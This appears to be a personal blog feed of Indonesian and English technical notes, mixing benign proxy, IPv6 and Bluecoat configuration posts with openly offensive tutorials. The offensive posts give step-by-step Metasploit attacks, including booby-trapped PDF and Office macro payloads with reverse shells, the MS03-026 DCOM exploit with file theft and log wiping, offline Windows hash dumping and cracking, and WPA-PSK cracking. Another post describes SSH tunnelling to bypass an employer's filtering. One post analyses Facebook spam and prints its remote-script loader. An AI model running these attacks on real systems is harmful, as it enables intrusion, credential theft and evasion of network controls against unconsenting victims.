: : My Sticky Notes : :

Menambahkan Proxy pada Terminal

noreply@blogger.com (Heri) — Fri, 07 Sep 2012 09:23:00 +0000

1. Masuk sebagai super user( root ) pada terminal atau console

   $sudo -i
   root@localhost’s password: xxxxxx

2. Lalu edit file apt.conf yang ada di /etc/apt/ dengan mengetikkan perintah dibawah ini:

   root@localhost’s :# vim /etc/apt/apt.conf

3. Tambahkan atau ubah baris berikut :

   Acquire::http::Proxy “http://usernameproxy:password@alamatproxy:port”;

   contoh saya memakai proxy http://192.168.1.1:3128, username + passwordnya menggunakan

   Acquire::http::proxy “http://user1:user1@192.168.1.1:3128/”;
   Acquire::ftp::proxy “ftp://user1:user1@192.168.1.1:3128/”;
   Acquire::https::proxy “https://user1:user1@192.168.1.1:3128/”;


4. Simpan konfigurasi kemudian diuji melakukan update repository dengan perintah apt-get update
    Cara lainnya adalah dengan mengedit file /etc/bash.bashrc lalu tambahkan baris berikut :

   export http_proxy=http://userproxy:password@alamatproxy:port/
   export https_proxy=http://userproxy:password@alamatproxy:port/
   export ftp_proxy=http://userproxy:password@alamatproxy:port/

IPv6 RFC's

noreply@blogger.com (Heri) — Wed, 18 Apr 2012 01:26:00 +0000

• RFC1752 - The Recommendation for the IP Next Generation Protocol
• RFC2460 - Internet Protocol, Version 6 (IPv6) Specifications (Obsoletes RFC1883)
Transition
• RFC4213 - Basic Transition Mechanisms for IPv6 Hosts and Routers
• RFC4942 - IPv6 Transition/Coexistence Security Considerations
• RFC4038 - Application Aspects of IPv6 Transition
• RFC4192 - Procedures for Renumbering an IPv6 Network without a Flag Day See Things to think about when renumbering an IPv6 network (draft chown)
• RFC4380 - Teredo: Tunneling IPv6 over UDP through NATs
• RFC3056 - Connection of IPv6 Domains via IPv4 Clouds (6to4 tunnel)
• RFC2743 - Generic Packet Tunneling in IPv6 Specification (See RFC1701 - GRE)
ISP
• RFC4029 - Scenarios and Analysis for Introducing IPv6 into ISP Networks
• RFC2185 - Routing Aspects Of IPv6 Transition
IPV6 Addressing space
• RFC4291 - IP Version 6 Addressing Architecture (Obsoletes RFC3513)
• RFC3769 - Requirements for IPv6 Prefix Delegation
• RFC1744 - Observations on the Management of the Internet Address Space
• RFC3587 - IPv6 Global Unicast Address Format
• RFC4193 - Unique Local IPv6 Unicast Addresses
• RFC3879 - Deprecating Site Local Addresses
• RFC4862 - IPv6 Stateless Address Autoconfiguration
• RFC3484 - Default Address Selection for Internet Protocol version 6 (IPv6)
• RFC3633 - IPv6 Prefix Options for Dynamic Host Configuration Protocol (DHCP) version 6
• RFC4861 - Neighbor Discovery for IP version 6 (IPv6)
• RFC3971 - SEcure Neighbor Discovery (SEND)
• RFC4941 - Privacy Extensions for Stateless Address Autoconfiguration in IPv6 (RFC3041)
• RFC3972 - Cryptographically Generated Addresses (CGA) Allocation
• RFC3177 - IAB/IESG Recommendations on IPv6 Address Allocations to Sites
• RFC1887 - An Architecture for IPv6 Unicast Address Allocation
• RFC1881 - IPv6 Address Allocation Management
• RFC4548 - Internet Code Point (ICP) Assignments for NSAP Addresses
• RFC1981 - Path MTU Discovery for IP version 6
• RFC4443 - Internet Control Message Protocol (ICMPv6) for the Internet Protocol Version 6 (IPv6) Specification
• RFC3596 - DNS? Extensions to Support IP Version 6
• RFC2464 - Transmission of IPv6 Packets over Ethernet Networks
• RFC2675 - IPv6 Jumbograms
Security
• RFC4864 - Local Network Protection for IPv6
• RFC4301 - Security Architecture for the Internet Protocol
• RFC4302 - IP Authentication Header
• RFC4835 - Cryptographic Algorithm Implementation Requirements for Encapsulating Security Payload (ESP) and Authentication Header (AH)
• RFC1828 - IP Authentication using Keyed MD5
• RFC1829 - Encapsulation, algorithme CBC du DES (Cypher Block Chaining)
• RFC1851 - Triple transformation par le DES
• RFC1852 - Authentification IP par clés SHA
Other
• RFC3053 - IPv6 Tunnel Broker

Blocking based on file size in Bluecoat Proxy SG

noreply@blogger.com (Heri) — Thu, 05 Apr 2012 04:05:00 +0000

For blocking the download based on file size, you would have to apply that under the Visual Policy Manager. It would be under the Web Access Layer and under Destination. Click set and select Response Header. Set the Header Name to Content-Length and add the Header Regex below according to the file size. Note that those regex below will block the file size specified and above.

500kb :

[0-9]{7,12}|[5-9][0-9]{4}

1 MB :

[0-9]{8,12}|[1-9][0-9]{6}

2 MB :

[0-9]{8,12}|[2-9][0-9]{6}

3 MB :

[0-9]{8,12}|[3-9][0-9]{6}

5 MB :

[0-9]{8,12}|[5-9][0-9]{6}

10 MB :

[0-9]{9,12}|[1-9][0-9]{8}

20 MB :

[0-9]{9,12}|[2-9][0-9]{8}

50 MB :

[0-9]{9,12}|[5-9][0-9]{8}

100 MB :

[0-9]{10,12}|[1-9][0-9]{10}

Delete the SGOS image from ProxySG

noreply@blogger.com (Heri) — Thu, 05 Apr 2012 03:56:00 +0000

You can delete the SGOS image/installed-system from ProxySG via the command line interface (CLI). Here is an example of how to delete a version of SGOS that is currently installed on your system. Please note that it is not necessary to delete an image before performing an upgrade or installing a new version of SGOS.
SGOS>en
Enable Password:
SGOS#config t
Enter configuration commands, one per line. End with CTRL-Z.
SGOS#(config)installed-systems
SGOS#(config installed-systems)view
ProxySG Appliance Systems
1. Version: SGOS 5.4.2.2, Release ID: 41580
Friday August 7 2009 03:29:40 UTC,
Attributes: Locked, FIPS capable
Boot Status: Last boot succeeded, Last Successful Boot: Monday September 7 2
009 12:52:52 UTC
2. Version: SGOS 5.4.1.12, Release ID: 40038
Wednesday June 17 2009 02:35:14 UTC,
Attributes: FIPS capable
Boot Status: Last boot succeeded, Last Successful Boot: Wednesday August 26
2009 23:58:22 UTC
3. Version: SGOS 5.3.3.1, Release ID: 39156
Thursday April 30 2009 00:30:57 UTC,
Attributes: FIPS capable
Boot Status: Last boot succeeded, Last Successful Boot: Thursday August 27 2
009 16:45:48 UTC
4. Version: SGOS 4.2.8.6, Release ID: 35252
Wednesday July 16 2008 22:53:55 UTC,
Attributes: None
Boot Status: Last boot succeeded, Last Successful Boot: Wednesday August 26
2009 22:46:06 UTC
5. Version: SGOS 4.2.7.1, Release ID: 32941
Thursday February 28 2008 22:26:10 UTC,
Attributes: None
Boot Status: Last boot succeeded, Last Successful Boot: Wednesday September
2 2009 14:41:31 UTC
Default system to run on next hardware restart: 1
System to replace next: 5
Current running system: 1
Enforce signed: Disabled
SGOS#(config installed-systems)delete 5
Are you sure you want to delete system 5? (y or n)y

ok
SGOS#(config installed-systems)view
ProxySG Appliance Systems
1. Version: SGOS 5.4.2.2, Release ID: 41580
Friday August 7 2009 03:29:40 UTC,
Attributes: Locked, FIPS capable
Boot Status: Last boot succeeded, Last Successful Boot: Monday September 7 2
009 12:52:52 UTC
2. Version: SGOS 5.4.1.12, Release ID: 40038
Wednesday June 17 2009 02:35:14 UTC,
Attributes: FIPS capable
Boot Status: Last boot succeeded, Last Successful Boot: Wednesday August 26
2009 23:58:22 UTC
3. Version: SGOS 5.3.3.1, Release ID: 39156
Thursday April 30 2009 00:30:57 UTC,
Attributes: FIPS capable
Boot Status: Last boot succeeded, Last Successful Boot: Thursday August 27 2
009 16:45:48 UTC
4. Version: SGOS 4.2.8.6, Release ID: 35252
Wednesday July 16 2008 22:53:55 UTC,
Attributes: None
Boot Status: Last boot succeeded, Last Successful Boot: Wednesday August 26
2009 22:46:06 UTC
5. Version: N/A, Release ID: N/A ( EMPTY )
No Timestamp,
Attributes: None
Boot Status: Unknown, Last Successful Boot: Unknown
Default system to run on next hardware restart: 1
System to replace next: 5
Current running system: 1
Enforce signed: Disabled
SGOS#(config installed-systems)

Configuring WCCP on the Router

noreply@blogger.com (Heri) — Wed, 04 Apr 2012 09:04:00 +0000

Step 1. Ensure that the router is running
WCCP Version 2 (this is the default)

Router>enable
Router#configure terminal
Router(config)#ip wccp version 2

Step 2 Enable WCCP and specify the
service group ID or keyword.

Router(config)#ip wccp 90

Step 3 Save the configuration startup-config

Router(config)#copy running-config

Load Balancing Weight on Bluecoat Proxy SG

noreply@blogger.com (Heri) — Wed, 04 Apr 2012 08:54:00 +0000

ProxySG appliances with higher weight values receive a higher

proportion of the redirected traffic than ProxySG appliances with lower weight values. For example,

suppose you have assigned the following weight values: ProxySG1=100, ProxySG2=100, and ProxySG3=50

respectively. The total weight value is 250, and so ProxySG1 and ProxySG2 will each receive 2/5 of the

traffic (100/250) and ProxySG3 will receive 1/5 of the traffic (50/250).

Hack windows 7 pc using metasploit (JAVA APPLET METHOD)

noreply@blogger.com (Heri) — Fri, 16 Mar 2012 01:26:00 +0000

msf > use exploit/multi/browser/java_signed_applet
msf exploit(java_signed_applet) > set SRVHOST 192.168.x.x
SRVHOST => 192.168.x.x
msf exploit(java_signed_applet) > set SRVPORT 80
SRVPORT => 80
msf exploit(java_signed_applet) > set URIPATH /
URIPATH => /
msf exploit(java_signed_applet) > set APPLETNAME google_inc
APPLETNAME => google_inc
msf exploit(java_signed_applet) > set LHOST 192.168.x.x
LHOST => 192.168.x.x

msf exploit(java_signed_applet) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.x.x:4444
[*] Using URL: http://192.168.x.x:80/
[*] Server started.
msf exploit(java_signed_applet) >

Certified Ethical Hacker (CEH) Module v.7

noreply@blogger.com (Heri) — Thu, 27 Oct 2011 05:35:00 +0000

Module baru CEH v.7 bisa langsung di download dibawah ini

Module 01 - Introduction to Ethical Hacking
Module 02 - Footprinting and Reconnaissance
Module 03 - Scanning Networks
Module 04 - Enumeration
Module 05 - System Hacking
Module 06 - Trojans and Backdoors
Module 07 - Viruses and Worms
Module 08 - Sniffers
Module 09 - Social Engineering
Module 10 - Denial of Service
Module 11 - Session Hijacking
Module 12 - Hacking Web Servers
Module 13 - Hacking Web Applications
Module 14 - SQL Injection
Module 15 - Hacking Wireless Networks
Module 16 - Evading IDS Firewalls and Honeypots
Module 17 - Buffer Overflow
Module 18 - Cryptography
Module 19 - Penetration Testing

Metaesploit attack Using Evil PDF

noreply@blogger.com (Heri) — Fri, 23 Sep 2011 00:16:00 +0000

Client-side Attack by Using Evil PDF
Step 1: Create your own payload

cd /pentest/exploits/framework3

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.169.1.20 LPORT=443 X > /tmp/payload.exe

Step 2: Create an evil pdf

msf > use windows/fileformat/adobe_pdf_embedded_exe
msf > set PAYLOAD windows/metepreter/reverse_tcp
msf > set EXENAME /tmp/payload.exe
msf > set FILENAME /tmp/BestComputerGuide.pdf
msf > set INFILENAME /tmp/Report.pdf
msf > set OUTPUTPATH /tmp/
msf > exploit

Note:
EXENAME is your payload/shellcode
FILENAME is your evil pdf file
INFILENAME is your original pdf file
OUTPUTPATH is your output directory

Result: /tmp/BestComputerGuide.pdf

Step 3: Send the evil pdf file to your client

Step 4: Wait for the reverse connection from the client

msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.1.20
msf > set LPORT 443
msf > exploit

Metaesploit attack Using MS OFFICE

noreply@blogger.com (Heri) — Fri, 23 Sep 2011 00:10:00 +0000

Client-side Attack by Using Evil MS-Office Apps (Excel or Word)
prepare your metaesploit and backtrack

Step 1: Create your own payload

cd /pentest/exploits/framework3

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.20 LPORT=443 X > /tmp/payload.exe

Step 2: Convert your newly created payload to VBA (Visual Basic for Application) script

cd /pentest/exploits/framework3/tools

./exe2vba.rb /tmp/payload.exe /tmp/payload.vba

Step 3: Copy and Paste the contents of the payload to your evil file

Open your evil file (Excel or Word). Select: Tools > Macro > Visual Basic Editor, paste the contents of your payload.vba, then save the file.
Step 4: Send the evil file to your client

Step 5: Wait for the reverse connection from the client

msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.1.20
msf > set LPORT 443
msf > exploit

Aplikasi Facebook Spam "pengen tau siapa aja yang Sering lihat profilemu"

noreply@blogger.com (Heri) — Wed, 04 May 2011 07:24:00 +0000

pengen tau siapa aja yang Sering lihat profilemu? http://www.facebook.com/JempolersIndonesia?sk=app_106878476015645

kok bnyak bgt ya link ini di status temen spam facebook lagi
Aplikasi atau link pengen tau siapa aja Yang Sering lihat Profilemu adalah bohong belaka, karena hanya bersifat mengacak (random).
Mari, kita analisis. Di App tersebut, Anda akan di suruh mengkopi alamat URL: [javascript:(a=(b=document).createElement('script')).src='//www.zingapoker.byethost4.com/_.js',b.body.appendChild(a);void(0)] yang ada di Grup Jempoler Indonesia. Perhatikan, Facebook Anda akan digiring menuju link www.zingapoker.byethost4.com seperti tertera di atas.
Nah silahkan Anda kunjungi saja isi www.zingapoker.byethost4.com, maka Anda akan menemukan 4 komponen yakni
.pureftpd-rename.36788.f8ccaee0
_.js
final.htm
qwq.js
Kemudian Klik link _.js pada halaman tersebut, maka Anda akan melihat bahasa PHP berikut ini :
=======================================================
var randomnumber=Math.floor(Math.random()*99999);
var chatmessage = ’%firstname% pengen tau saipa aja yang Sering lihat profilemu? :) http://www.facebook.com/JempolersIndonesia?sk=app_106878476015645′;
var postmessage = ’wow…ternyata banyak juga yang suka lihat profileku y : \n\ %tf% - 436 views \n\ %tf% - 83 views \n\ %tf% - 42 views \n\ %tf% - 30 views \n\ pengen tau saipa aja yang Sering lihat profilemu? http://www.facebook.com/JempolersIndonesia?sk=app_106878476015645′;
var redirect = ’http://www.facebook.com/JempolersIndonesia?sk=app_106878476015645′;
var eventdesc = ’You can now see whos been on your page! \n\ \n\ Go here: http://www.facebook.com/JempolersIndonesia?sk=app_106878476015645&’+randomnumber+’ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\”;
var eventname = ’See Who Likes You!’;
var nfriends = 5000;
var debug = false;
var wf = 0;
var mf = function () {
if (wf <= 0) {
setTimeout(function () {
window['top']['location']['href'] = redirect;
}, 500);
};
};
=================================================
Perhatikan string/teks yang di cetak tebal, terlihat bahwa pemilihan teman dan jumlah klik menggunakan fungsi RANDOM (acak pilih sebarang). Artinya pemilihan teman teman Fb yang melihat profil Anda dan jumlah berapa kali mereka melihat profil Anda adalah proses mengacak secara Random.
Termasuk tulisan di wall[wow...ternyata banyak juga yang suka lihat profileku y] adalah bawaan dari program ini.
Aplikasi ini juga akan secara acak mengirim pesan Chatt kepada teman-teman Anda yang kebetulan sedang OL. Coba sekarang Anda buka elemen qwq.js pada halamanwww.zingapoker.byethost4.com, akan tertampil kode bahasa :
====================================
var randomnumber=Math.floor(Math.random()*99999);
var chatmessage = ’%firstname% See who views your profile http://www.facebook.com/pages/JEMPOLERs_LIKE/143364539065677?sk=app_106878476015645′;
var postmessage = ’My Top Profile Viewers: \n\ %tf% - 436 views \n\ %tf% - 83 views \n\ %tf% - 42 views \n\ %tf% - 30 views \n\ See who views your profile http://www.facebook.com/pages/JEMPOLERs_LIKE/143364539065677?sk=app_106878476015645′;
var redirect = ’http://www.facebook.com/JempolersIndonesia?sk=app_106878476015645′;
var eventdesc = ’You can now see whos been on your page! \n\ \n\ Go here: http://www.facebook.com/pages/JEMPOLERs_LIKE/143364539065677?sk=app_106878476015645&’+randomnumber+’ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\”;
var eventname = ’See Who Likes You!’;
====================================
Oleh karena itu, jangan percaya pada data/hasil yang di tampilkan, karena hanya mengacak belaka. Justru ada kemungkinan data-data Anda dan teman-teman Anda bisa dicuri oleh aplikasi ini.

URL Pendek Facebook

noreply@blogger.com (Heri) — Wed, 04 May 2011 07:23:00 +0000

Barusan saya melihat status orang yang hampir sama. Awalnya saya kira ini memanfaatkan aplikasi facebook. Setelah dikopi paste dengan wget diterminal. Beginilah hasilnya :
http://tinyurl.com/sampahh berubah menjadi :
http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt’%3Cscript%3Ewindow.onload=function(){document.forms[0].message.value=’jangan%20salahin%20w%20kalo%20lo%20bakal%20ngakak%20ngeliat%20ni%20orang%20:D%20http://tinyurl.com/sampahh’;document.forms[0].submit();}%3C/script%3E

Huh …tinyurl-nya berfungsi untuk memendekkan javascriptnya
kalau kita decode jadilah seperti ini

http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt'
Dasar orang isenk Bukan virus, tapi ya mengubah satus kita sesuai dengan message value di atas.

Socks Proxy dengan SSH Tunelling

noreply@blogger.com (Heri) — Sun, 21 Nov 2010 14:31:00 +0000

Sebelum ke tutorial mari kita pahamin dulu apa sih socks itu, menurut wikipedia socks adalah sebagai berikut :

SOCKS adalah protokol Internet yang memfasilitasi jaringan routing paket antara aplikasi client-server melalui server proxy. SOCKS terdapat pada Layer 5 dari model OSI Layer (lapisan perantara antara lapisan presentasi dan lapisan transport). Port 1080 adalah port yang biasa digunakan untuk server SOCKS.

Oh ia.. trik ini dapat digunakan untuk membuka situs-situs yang di blok oleh administrator jaringan , saya pribadi sering menggunakan trik ini , karena akses internet di kantor memang dibatasi oleh admin hehehe

ok kalu udah paham kita lanjut, tetapi ada hal yang perlu di perhatikan dalam tutorial kali ini yaitu Pastikan anda punya access SSH ke salah satu server di internet, apabila ada memiliki access tersebut sekarang kita lanjutkan

Tutorial ini saya praktekkan pada Linux, namun user sistem Operasi Windows sebenarnya juga bisa mungkin akan saya bahas terpisah dalam posting lain.

Buka Terminal lalu ketikkan perintah berikut :

ssh -D 127.0.0.1:1080 -l sucks05 b9net.ath.cx

setelah muncul permintaan password silahkan masukkan password anda lalu enter

Buka web browser anda dan access lah cmyip.com, maka akan terlihat ip public anda
Buka web Browser anda, saya contohkan di sini menggunakan Firefox, Edit —>> Perference, lalu pilih Advance lalu tab Network dan tekan tombol setting lalu setting sesuai gambar berikut,Isi SOCK Host dengan 127.0.0.1 dan port dengan 1080 lalu Ok
Setelah itu buka kembali web browser anda dan access lagi cmyip.com, maka ip public anda akan berubah.., ya sekarang anda browsing menggunakan ip dari SSH Server anda

Jangan menutup terminal anda selama masih menggunakan proxy ini.

Berikut Penjelasan dari perintah ssh di atas

ssh -D 127.0.0.1:1080 -l sucks05 b9net.ath.cx

ssh : untuk menjalankan program ssh
-D 127.0.0.1:1080 : perintah untuk membuka port 1080 pada ip 127.0.0.1 atau localhost
-l sucks05 : login dengan username sucks05 (ganti dengan username anda pada SSH server)
b9net.ath.cx : host dari SSH server (ganti dengan host SSH Server anda)

Cracking Password Windows Via BT 4

noreply@blogger.com (Heri) — Sun, 21 Nov 2010 14:18:00 +0000

Meskipun seorang newbie, tapi itu gak akan menghilangkan semangat untuk membuat sebuah tutorial yang bisa di share buat teman-temin semua, terlepas dari banyak kekurangan disana sini ane mohon maaf yee , hehehe...

1.Pertama setting di bios anda booting dari CD

2.Kemudian masuk ke BT seperti biasa dengan perintah startx

3.kita lanjut ke tahap mengkases file windows via BT, kenapa kita mengakses data windows, yah terang aja kan kita mau ngecrack passwordnya yg terletak di direktori C://WINDOWS/system32/config/ SAM , file yg bernama SAM inilah tempat di mana windows menyembunyikan password login windows. Wokeh lalu masuk di bt console dan ikuti langkah berikut:

Code:

untuk mengakses file window dan mounting di BT
root@backtrackers:~# mountconfig

maka akan muncul tampilan Disk & FileSystem Configuration, selanjutnya di situ kita bisa lihat bahwa drive C: windows terletak di partisi 1, atau kita bisa analisa satu persatu kok. Klik di partisi tersebut lalu klik new untuk merubah mountingnya. Lalu configurasi sbb:

Quote:

Type: Automatic
Mount Point: /mnt/sda1 (kalo belum ada folder sda1 nya silahkan di buat yah)
Device: /dev/sda1/

pastikan posisinya udah enable alias warna ijo......

selanjutnya lakukan mounting dengan perintah:

Code:

root@backtrackers:~# mount /dev/sda1 /mnt/sda1

maka drive window sudah bisa kita akses di bt
lalu lihat secara detail file windowsnya, bisa juga kita lihat di explorer nya bt dimana letak file SAM nya.

Code:

root@backtrackers:~# ls -l /mnt/sda1/WINDOWS/system32/config/SAM -rwxrwxrwx 1 root root 262144 2009-11-10 00:17 /mnt/sda1/WINDOWS /system32/config/SAM

untuk selanjutnya windows menyembunyikan sistem proteksi file SAM nya di file yg bernama syskey yang terletak di direktori berikut:

Code:

root@backtrackers:~# ls -l /mnt/sda1/WINDOWS/system32/config
total 31916
-rwxrwxrwx 1 root root 6029312 2009-11-11 01:23 system

(karena terlalu banyak untuk di tampilkan, jadi gwe capture aja file target kita, yaitu system)

okey kita udah dapet yg namanya file system, dan untuk selanjutnya kita akan capture file syskey tersebut dan kita jadikan sebuah file dengan program yg namanya bkhive yang terletak di :
aplikasi > backtrak > privilege escalation > password attack > offline attack > bkhive

atau langsung ketik di console juga gpp, gak dosa kok :)), disini nama file output yg gwe buat adalah wsyskey (buat penamaan terserah lo pada deh, mau bikin asiacarerasyskey atau tukul_syskey juga ga jadi masalah ;)) )

Code:

root@backtrackers:~# bkhive /mnt/sda1/WINDOWS/system32/config/system wsyskey
bkhive 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : $$$PROTO.HIV
Default ControlSet: 001
Bootkey: 0c7b80c915ccc01cd4e949af7ebdde90

okey kita udah berhasil membuat file syskeynya, bisa di liat kok (gwe simpern filenya di /root)

Code:

root@backtrackers:~# ls -l
-rw-r--r-- 1 root root 16 2009-11-10 23:01 wsyskey

selanjutnya untuk melihat file yg terenkripsi didalam file system kita gunakan program samdump2
aplikasi > backtrak > privilege escalation > password attack > offline attack > samdump2

so yang artinya, jadi.., masukin perintah begono noh......, sehingga muncullah beberapa login yg ada di windows yg udah kita dump dari file sam

Code:

root@backtrackers:~# samdump2 /mnt/sda1/WINDOWS/system32/config/SAM wsyskey
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : SAM
Administrator:500:545a8bd6333a94aff4227b3697fb5b7c:71dd6e54afa0b12d34f6aadb93a02564:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:4977de14abb666c164f9f2ff61b57ac6:2932ca40988c78b801d226c8140b6702:::
juliaperes:1002:aad3b435b51404eeaad3b435b51404ee:ce899a3735c9489ffdc2c48df3ed6fdd:::
vinblackganteng:1003:85fcfffed6e0e9fcb75e0c8d76954a50:b33902ac5aacd0a02af58e900fa594a5:::

sekanjutnya...., eh sori.., selanjutnya kamsudnya....., kita rubah file wsyskey tadi menjadi file hash dalam ekstensi .txt , selanjutnya filenya ane kasih nama whash.txt

Code:

root@backtrackers:~# samdump2 /mnt/sda1/WINDOWS/system32/config/SAM wsyskey > whash.txt
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : SAM

lalu liat kembali apa file tersebut udah jadi apa belon.....

Code:

root@backtrackers:~# ls -l
total 162944
-rw-r--r-- 1 root root 431 2009-11-10 23:05 whash.txt

nah lo udah ngonol...eh nongol dia...... ;)) , lalu liat isinya dengan perintah cat

Code:

root@backtrackers:~# cat whash.txt
Administrator:500:545a8bd6333a94aff4227b3697fb5b7c:71dd6e54afa0b12d34f6aadb93a02564:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:4977de14abb666c164f9f2ff61b57ac6:2932ca40988c78b801d226c8140b6702:::
juliaperes:1002:aad3b435b51404eeaad3b435b51404ee:ce899a3735c9489ffdc2c48df3ed6fdd:::
vinblackganteng:1003:85fcfffed6e0e9fcb75e0c8d76954a50:b33902ac5aacd0a02af58e900fa594a5:::

nah udah nongol lagi dah.., file2 user login dengan enkripsi hash nya, dan untuk selanjutnya kita akan crack file hash tersebut dengan program di bt4 prefinal yg namanya john (bukan john banting yah ,, hehehe) yang ada di
aplikasi > backtrak > privilege escalation > password attack > offline attack > john

Code:

root@backtrackers:/pentest/passwords/jtr# ./john /root/whash.txt

sehingga si bang john akan mengcrack file hash yg ada di file whash.txt tersebut yang kemudian menampilkan password windows tersebut, dalam proses crackingnya program ini seolah2 seperti hang, padahal dia sedang melakukan bruteforce terhadap file tersebut sehingga jika kita tidak akan menunggu lebih lama kita tekan aja control c untuk men setop prosesnya.

Karena bang john tidak bisa membedakan huruf besar kecil dan besar maka kita lihat file yg di simpen bang john di direktori dia sendiri yaitu

Code:

root@backtrackers:~# cat /pentest/passwords/jtr/john.pot
$1$xd5xuJYT$x6un0Ho.gXVCv4ZduhsYQ.:toor
$LM$aad3b435b51404ee:
$LM$f4227b3697fb5b7c:SEKSI
$LM$b75e0c8d76954a50:GANTENG123

dan yang terkahir setelah kita lihat di direktori bang john kembali kita tampilkan file pamungkas dengan perintah cat

Code:

root@backtrackers:/pentest/passwords/jtr# ./john --show /root/whash.txt

maka terlihatlah password untuk
vinblackganteng: ganteng123
juliaperes: SEKSI

NB:
1. untuk proses crackingnya terkadang penggunaan password yg panjang dan multikarakter sepertinya bang john cukup kesulitan atau memakan waktu lama (perasaan ane sih, mungkin ada temen2 laen yg punya teknik sendiri atau solusi, yang jelas file hash nya udah kita dapetin)
2. dalam proses cracking ini bang john tidak akan mengulangi lagi terhadap file yang udah di cracknya, jadi walaupun kita mengulanginya sampai 10 kali, si john tetap pada pendiriannya yaitu cracking yg pertama.

Sekian dulu tutorial yang acak2an ini , semoga membantu

Cracking WPA-PSK

noreply@blogger.com (Heri) — Sun, 21 Nov 2010 13:54:00 +0000

semoga tutorial ini dapat membantu...

1. Siapkan CD Live Backtrack n tentunya dengan partnernya n of course segelas kopi agar lebih santai..

2. masuk ke dekstop dengan perintah ~# startx

3. buka konsole dan ketikkan perintah :~# ifconfig -a

4. :~# ifconfig wlan0 up (tuk mengaktifkan interface wlan0)

5. :~# airmon-ng
:~# airmon-ng start wlan0

:~# airodump-ng mon0

mon0 adalah interface virtual hasil dari airmon-ng tadi

hasil dari airodump-ng mon0

:~# airodump-ng -w test --channel 11 --bssid 00904c910001 mon0

8. :~# aireplay-ng -0 1 -a 00904c910001 -c oo1cbfa13fe3 mon0

:~# aircrack-ng test-01.cap -w /pentest/passwords/wordlists/inawpa.txt

inawpa.txt adalah file password yang saya buat sendiri dan terletak pada /pentest/passwords/wordlists/inawpa.txt

sebagai informasi, keberhasilan proses cracking tergantung ada tidaknya password yang ada di list password dengan password yang sebenarnya...jika password yang digunakan pada jaringan tersebut ada di list password maka proses cracking akan berhasil dan jika password list yang qt miliki tidak mencatat password yang digunakan pada jaringan tersebut kemungkinan keberhasilan proses cracking akan gagal..

Menembus Windows 2000, 2003, XP SP1

noreply@blogger.com (Heri) — Sun, 21 Nov 2010 13:42:00 +0000

Dasar Teori
===========
Bugs sistem operasi windows salah satunya terjadi stack overflow/ buffer overflow di interface RPC yang mengaktifkan DCOM Component (Distributed Component Object Modul) yang secara default instalasi memang di aktifkan oleh windows yang dalam protokol Netbios, DCOM di gunakan untuk membuka interface komunikasi dengan komputer lain yang mengakses sharing file dengan memanfaatkan port 135. Hal ini tentu memungkinkan seorang attacker menyerang port 135 dan memungkinkan attacker bisa mendapatkan akses setingkat AUTHORITY SYSTEM karena RPC running dengan otoritas sistem.

Alat-alat yg digunakan
=======================
OS : Backtrack 4 R1
Target : Windows 2000, 2003, XP SP1
Tools : Metasploit v.3.4
Exploit : ms03_026_dcom
Payload : windows/meterpreter/reverse_tcp
Port : 135

Command yg digunakan
=====================
1. Setting IP static.
root@bt:~#ifconfig eth0 [ip-address]

2. Ping IP target, untuk mengetahui konektifitas komputer target.
root@bt:~#ping [ip-address-target]

3. Scan sistem operasinya dan apakah port 135 terbuka.
root@bt:~# nmap -sS-O [ip-address-target]

4. Login ke Metasploit
root@bt:~#cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3#./msfconsole

5. Exploit RPC Dcom dan peroleh shell windows
msf> usewindows/dcerpc/ms03_026_dcom
msfexploit(ms03_026_dcom)> set RHOST [ip-address-target]
msfexploit(ms03_026_dcom)> set LHOST [ip-address]
msfexploit(ms03_026_dcom)> set PAYLOAD windows/meterpreter/reverse_tcp
msfexploit(ms03_026_dcom)> exploit
meterpreter >execute -H -f cmd.exe –i (Get Shell Windows)
Process1116 created.
Channel 2 created.
Microsoft WindowsXP [Version5.1.2600]
(C) Copyright1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

6. Download File
Meterpreter > download [path-source-target][path-source-local]
Example:Download Sunset.jpg
meterpreter > download C:\\'Documents and Settings'/'All Users'/Documents/'My
Pictures'/'SamplePictures'/Sunset.jpg /root/

7. Upload File
Meterpreter > upload [path-source-local][path-source-target]
Example:Upload install.sh
meterpreter >upload /root/install.sh C:\\'Documents and
Settings'/Administrator/Desktop/

8. Erase Log File
meterpreter >clearev

Note:
[using help command]: meterpreter> ?

